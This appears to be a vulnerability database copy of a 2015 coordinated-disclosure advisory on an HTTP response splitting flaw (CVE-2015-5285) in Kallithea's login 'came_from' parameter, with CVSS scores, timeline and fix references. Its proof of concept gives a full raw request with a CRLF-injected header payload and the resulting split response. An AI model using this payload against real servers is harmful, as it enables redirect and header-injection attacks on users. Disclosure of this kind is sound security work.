Gjoko KrsticZSL-2015-5267Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
6.5 Medium
AI Score
Confidence
High
0.062 Low
EPSS
Percentile
93.6%
Title: Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability
Advisory ID: ZSL-2015-5267
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 07.10.2015
Summary
Kallithea, a member project of Software Freedom Conservancy, is a GPLv3’d, Free Software source code management system that supports two leading version control systems, Mercurial and Git, and has a web interface that is easy to use for users and admins.
Description
Kallithea suffers from a HTTP header injection (response splitting) vulnerability because it fails to properly sanitize user input before using it as an HTTP header value via the GET ‘came_from’ parameter in the login instance. This type of attack not only allows a malicious user to control the remaining headers and body of the response the application intends to send, but also allow them to create additional responses entirely under their control.
Vendor
Kallithea - <https://www.kallithea-scm.org>
Affected Version
0.2.9 and 0.2.2
Tested On
Kali
Python
Vendor Status
[21.09.2015] Vulnerability discovered.
[22.09.2015] Vendor contacted.
[22.09.2015] Vendor responds asking more details.
[23.09.2015] Sent details to the vendor.
[23.09.2015] Vendor confirms the issue planing to fix in version 0.3.
[24.09.2015] Working with the vendor.
[24.09.2015] CVE-2015-5285 assigned.
[02.10.2015] Vendor releases version 0.3 to address this issue.
[07.10.2015] Coordinated public security advisory released.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
High five to Mads and Andrew!
References
[1] <https://kallithea-scm.org/news/release-0.3.html>
[2] <https://kallithea-scm.org/security/cve-2015-5285.html>
[3] <https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068>
[4] <https://vulners.com/cve/CVE-2015-5285>
[5] <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5285>
[6] <https://exchange.xforce.ibmcloud.com/vulnerabilities/106915>
[7] <https://cxsecurity.com/issue/WLB-2015100066>
[8] <https://packetstormsecurity.com/files/133897/Kallithea-0.2.9-HTTP-Response-Splitting.html>
[9] <https://www.exploit-db.com/exploits/38424/>
Changelog
[07.10.2015] - Initial release
[11.10.2015] - Added reference [6], [7] and [8]
[12.10.2015] - Added reference [9]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability
Vendor: Kallithea
Product web page: https://www.kallithea-scm.org
Version affected: 0.2.9 and 0.2.2
Summary: Kallithea, a member project of Software Freedom Conservancy,
is a GPLv3'd, Free Software source code management system that supports
two leading version control systems, Mercurial and Git, and has a web
interface that is easy to use for users and admins.
Desc: Kallithea suffers from a HTTP header injection (response splitting)
vulnerability because it fails to properly sanitize user input before
using it as an HTTP header value via the GET 'came_from' parameter in
the login instance. This type of attack not only allows a malicious
user to control the remaining headers and body of the response the
application intends to send, but also allow them to create additional
responses entirely under their control.
Tested on: Kali
Python
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5267
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php
Vendor: https://kallithea-scm.org/news/release-0.3.html
Vendor Advisory: https://kallithea-scm.org/security/cve-2015-5285.html
CVE ID: 2015-5285
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285
21.09.2015
--
GET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
Host: 192.168.0.28:8080
Content-Length: 0
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.0.28:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438
###
HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 411
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Sep 2015 13:58:05 GMT
Location: http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
Pragma: no-cache
Server: waitress
</p>
<title>302 Found</title>
<h1>302 Found</h1>
The resource was found at <a href="http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk">http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk</a>;
you should be redirected automatically.
</body></html>Related
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
6.5 Medium
AI Score
Confidence
High
0.062 Low
EPSS
Percentile
93.6%